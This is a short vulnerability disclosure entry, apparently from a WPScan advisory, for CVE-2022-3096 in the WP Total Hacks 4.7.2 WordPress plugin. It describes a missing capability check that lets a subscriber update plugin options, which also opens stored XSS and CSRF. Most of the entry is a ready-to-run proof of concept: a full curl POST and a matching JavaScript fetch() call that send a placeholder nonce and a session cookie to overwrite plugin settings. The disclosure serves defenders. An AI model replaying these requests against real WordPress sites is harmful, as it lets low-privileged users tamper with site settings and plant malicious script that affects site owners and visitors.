CVE: CVE-2022-3096
Name: WP Total Hacks (wp-total-hacks)
Version: 4.7.2
Date: 2022-04-01 19:56:10
Advisory: https://wpscan.com/vulnerability/46996537-a874-4b2e-9cd7-7d0832f9704d
Type: Authenticated Options Update, Stored XSS, CSRF
Exploit: Log in as a subscriber and send the request below; the plugin performs no permission or capability checks and no further sanitization on the submitted values. The same request also allows Stored XSS.
curl "https://example.com/wp-admin/" -X POST -H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H "Accept-Language: de,en;q=0.7,en-US;q=0.3" -H "Accept-Encoding: gzip, deflate" -H "Referer: https://example.com/wp-admin/" -H "Content-Type: application/x-www-form-urlencoded" -H "Upgrade-Insecure-Requests: 1" -H "Origin: https://example.com" -H "DNT: 1" -H "Connection: keep-alive" -H "Cookie: wordpress_..." -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: same-origin" --data-raw "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern"
await fetch("https://example.com/wp-admin/", { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "de,en;q=0.7,en-US;q=0.3", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1", 
"Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1" }, "referrer": "https://example.com/wp-admin/", "body": "wpbiz-nonce=aaa&tabid=total-hacks-admin&wfb_favicon=&wfb_admin_favicon=&wfb_apple_icon=&wfb_remove_xmlrpc=&wfb_hide_version=&wfb_remove_more=&wfb_remove_excerpt=&wfb_disallow_pingback=&wfb_google_analytics=wwwww&wfb_google=ttttt&wfb_bing=&wfb_revision=&wfb_selfping=&wfb_pageexcerpt=&wfb_createpagefordraft=&wfb_custom_logo=&wfb_admin_footer_text=&wfb_login_logo=&wfb_login_url=&wfb_login_title=&wfb_shortcode=&wfb_oembed=&wfb_webmaster=&wfb_sendername=&wfb_emailaddress=&wfb_update_notification=&submit=%C3%84nderungen+speichern", "method": "POST", "mode": "cors" });